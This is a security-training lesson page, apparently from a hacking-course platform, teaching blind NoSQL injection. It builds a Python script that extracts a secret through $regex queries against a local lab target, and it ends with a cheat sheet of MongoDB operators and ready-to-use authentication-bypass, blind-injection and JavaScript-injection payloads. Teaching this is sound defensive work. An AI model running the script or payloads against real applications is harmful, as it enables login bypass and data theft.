Introduction to NoSQL Injection

Automating Blind Data Extraction

Scenario

Manually extracting data via blind injection gets tedious very quickly. Luckily, it is very easily automated, so let's do that.

We've already dumped the trackingNum for Franz's package, so we will use a new target for this section. There is a package addressed to bmdyy with the tracking number HTB{... that we will dump.

If you already know a bit of Python(3) that's super, but this section should be simple enough to understand even if you don't.

Developing the Script

The first thing we will do is create a function for querying the 'oracle'.

import requests
import json

# Oracle
def oracle(t):
    r = requests.post(
        "http://127.0.0.1/index.php",
        headers = {"Content-Type": "application/json"},
        data = json.dumps({"trackingNum": t})
    )
    return "bmdyy" in r.text

This function will send a POST request to /index.php and set the value of trackingNum to whatever query we want. It then checks if the response contains the text bmdyy, which indicates our query matched our target package.

We can verify if the oracle function works as intended with a pair of assert statements that test known answers. In this case, we know there is no tracking number X, so we can verify that the oracle returns False when it sends a request with trackingNum: "X". Furthermore, we know that there is a tracking number HTB{.*, so we can verify that the oracle function returns True.

# Make sure the oracle is functioning correctly
assert (oracle("X") == False)
assert (oracle({"$regex": "HTB{.*"}) == True)

If we run this and everything is set up correctly, there should be no output. If you have some output, then there is most likely a typo in your code (like in this example, lowercase b instead of B):

[!bash!]$ python3 mangopost-exploit.py 

Traceback (most recent call last):
  File "/...SNIP.../mangopost-exploit.py", line 18, in <module>
    assert (req({"$regex": "^HTb{.*"}) == True)
AssertionError

Once we have the oracle function ready and verified as working correctly, we can proceed to work on actually dumping the tracking number.

For this section, we can assume the tracking number matches the following format: ^HTB\{[0-9a-f]{32}\}$ aka HTB{ followed by 32 characters [0-9a-f] followed by a }. Knowing this, we can limit our search to only these characters and significantly reduce the number of requests it will take.

# Dump the tracking number
trackingNum = "HTB{" # Tracking number is known to start with 'HTB{'
for _ in range(32): # Repeat the following 32 times
    for c in "0123456789abcdef": # Loop through characters [0-9a-f]
        if oracle({"$regex": "^" + trackingNum + c}): # Check if <trackingNum> + <char> matches with $regex
            trackingNum += c # If it does, append character to trackingNum ...
            break # ... and break out of the loop
trackingNum += "}" # Append known '}' to end of tracking number

This code will generate RegEx queries and use the oracle to dump one character at a time until all the characters are known. Once the code finishes, we can verify that the tracking number is correct with another assert and print it out:

# Make sure the tracking number is correct
assert (oracle(trackingNum) == True)

print("Tracking Number: " + trackingNum)

The finished script

Putting everything together, the completed script should look like this:

#!/usr/bin/python3

import requests
import json

# Oracle
def oracle(t):
    r = requests.post(
        "http://127.0.0.1/index.php",
        headers = {"Content-Type": "application/json"},
        data = json.dumps({"trackingNum": t})
    )
    return "bmdyy" in r.text

# Make sure the oracle is functioning correctly
assert (oracle("X") == False)
assert (oracle({"$regex": "^HTB{.*"}) == True)

# Dump the tracking number
trackingNum = "HTB{" # Tracking number is known to start with 'HTB{'
for _ in range(32): # Repeat the following 32 times
    for c in "0123456789abcdef": # Loop through characters [0-9a-f]
        if oracle({"$regex": "^" + trackingNum + c}): # Check if <trackingNum> + <char> matches with $regex
            trackingNum += c # If it does, append character to trackingNum ...
            break # ... and break out of the loop
trackingNum += "}" # Append known '}' to end of tracking number

# Make sure the tracking number is correct
assert (oracle(trackingNum) == True)

print("Tracking Number: " + trackingNum)

Running this script should dump the tracking number successfully. Since the alphabet (0-9a-f) is so small, the process goes very quickly; in this case, it only takes around 20 seconds.

[!bash!]$ time python3 mangopost-exploit.py 

Tracking Number: HTB{...SNIP...}

real    0m23.006s
user    0m0.419s
sys     0m0.033s

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 6 Follow along with this section, recreate the script locally and dump the tracking number.

+10 Streak pts

Previous Next

Go to Questions

Tools of the Trade

Defending against NoSQL Injection

Preventing NoSQL Injection Vulnerabilities

Skills Assessment

Skills Assessment I Skills Assessment II

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

MongoDB Usage

Connect to MongoDB: mongosh mongodb://127.0.0.1:27017
List databases: show databases
List collections: show collections
Insert data: db.collection.insertOne({...})
Insert lots of data: db.apples.insertMany([{...},{...},...])
Selecting data: db.collection.find({...})
Selecting one piece of data: db.collection.findOne({...})
Update (one) document: db.collection.updateOne({...}, {...})
Update multiple documents: db.collection.updateMany({...}, {...})
Delete document(s): db.apples.remove({...})

Query Operators

Type	Operator	Description	Example
Comparison	`$eq`	Matches values which are `equal to` a specified value	`type: {$eq: "Pink Lady"}`
Comparison	`$gt`	Matches values which are `greater than` a specified value	`price: {$gt: 0.30}`
Comparison	`$gte`	Matches values which are `greater than or equal to` a specified value	`price: {$gte: 0.50}`
Comparison	`$in`	Matches values which exist `in the specified array`	`type: {$in: ["Granny Smith", "Pink Lady"]}`
Comparison	`$lt`	Matches values which are `less than` a specified value	`price: {$lt: 0.60}`
Comparison	`$lte`	Matches values which are `less than or equal to` a specified value	`price: {$lte: 0.75}`
Comparison	`$nin`	Matches values which are `not in the specified array`	`type: {$nin: ["Golden Delicious", "Granny Smith"]}`
Logical	`$and`	Matches documents which `meet the conditions of both` specified queries	`$and: [{type: 'Granny Smith'}, {price: 0.65}]`
Logical	`$not`	Matches documents which `do not meet the conditions` of a specified query	`type: {$not: {$eq: "Granny Smith"}}`
Logical	`$nor`	Matches documents which `do not meet the conditions` of any of the specified queries	`$nor: [{type: 'Granny Smith'}, {price: 0.79}]`
Logical	`$or`	Matches documents which `meet the conditions of one` of the specified queries	`$or: [{type: 'Granny Smith'}, {price: 0.79}]`
Evaluation	`$mod`	Matches values which divided by a `specific divisor` have the `specified remainder`	`price: {$mod: [4, 0]}`
Evaluation	`$regex`	Matches values which `match a specified RegEx`	`type: {$regex: /^G.*/}`
Evaluation	`$where`	Matches documents which `satisfy a JavaScript expression`	`$where: 'this.type.length === 9'`

Authentication Bypass / Data Exfiltration Payloads:

URL-Encoded

param[$ne]=x
param[$gt]=
param[$gte]=
param[$lt]=~
param[$lte]=~
param[$regex]=.*

JSON

{param: {$ne: 'x'}}
{param: {$gt: ''}}
{param: {$gte: ''}}
{param: {$lt: '~'}}
{param: {$lte: '~'}}
{param: {$regex: '.*'}}
{param: {$nin: []}}

Blind NoSQLi Payloads:

URL-Encoded

param[$regex]=^XYZ.*$

JSON

{param: {$regex: '^XYZ.*$}}

Server-Side JavaScript Injection Payloads:

' || true || ''=='
" || true || ""=="

This cheat sheet contains a (non-comprehensive) list of payloads you may use when testing an application for NoSQL injection vulnerabilities. The most important qualities for finding vulnerabilities are creativity and the ability to adapt, so it is possible that these payloads will not work in your specific scenario, but something else does.

Some other resources you may want to refer to may be: